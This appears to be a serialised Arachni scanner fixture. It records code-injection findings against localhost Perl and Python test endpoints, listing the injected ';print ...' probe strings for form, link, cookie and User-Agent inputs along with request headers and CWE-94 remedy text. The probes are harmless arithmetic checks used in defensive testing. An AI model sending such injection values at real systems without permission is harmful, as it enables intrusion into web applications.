:id: '4196690816913082'
var: input
url: http://localhost:6875/perl/form/straight
injected: ;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: POST
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/perl/form/append
elem: form
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128;
:follow_location: true
:injected: default;print 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/form/append
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/perl/form/append
injected: default;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/perl/link/append?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128;
:follow_location: true
:injected: default;print 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/link/append?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/perl/link/append?input=default
injected: default;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/perl/link/straight?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128;
:follow_location: true
:injected: ;print 287630581954+4196403186331128;
:combo:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/link/straight?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/perl/link/straight?input=default
injected: ;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjoyOCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie2
url: http://localhost:6875/perl/cookie/append
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128;
:injected: cookie value;print 287630581954+4196403186331128;
:combo:
!binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/cookie/append
:verification: false
:id: '4196690816913082'
var: cookie2
url: http://localhost:6875/perl/cookie/append
injected: cookie value;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128%3B;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:6875/perl/cookie/straight
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128;
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ;print 287630581954+4196403186331128;
:injected: ;print 287630581954+4196403186331128;
:combo:
!binary "Y29va2ll": ;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/cookie/straight
:verification: false
:id: '4196690816913082'
var: cookie
url: http://localhost:6875/perl/cookie/straight
injected: ;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=%3Bprint+287630581954%2B4196403186331128%3B
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjozMiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/perl/header/append
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ! '";print 287630581954+4196403186331128;#'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user";print 287630581954+4196403186331128;#
:injected: arachni_user";print 287630581954+4196403186331128;#
:combo:
User-Agent: arachni_user";print 287630581954+4196403186331128;#
:action: http://localhost:6875/perl/header/append
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/perl/header/append
injected: arachni_user";print 287630581954+4196403186331128;#
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082, 4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user";print 287630581954+4196403186331128;#
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/perl/header/straight
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128;
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;print 287630581954+4196403186331128;
:injected: ;print 287630581954+4196403186331128;
:combo:
User-Agent: ;print 287630581954+4196403186331128;
:action: http://localhost:6875/perl/header/straight
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/perl/header/straight
injected: ;print 287630581954+4196403186331128;
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;print 287630581954+4196403186331128;
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/python/form/straight
elem: form
method: POST
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128
:follow_location: true
:injected: ;print 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128
:action: http://localhost:6875/python/form/straight
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/python/form/straight
injected: ;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks:
:stuff:
- Blah
- Blah2
method: POST
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
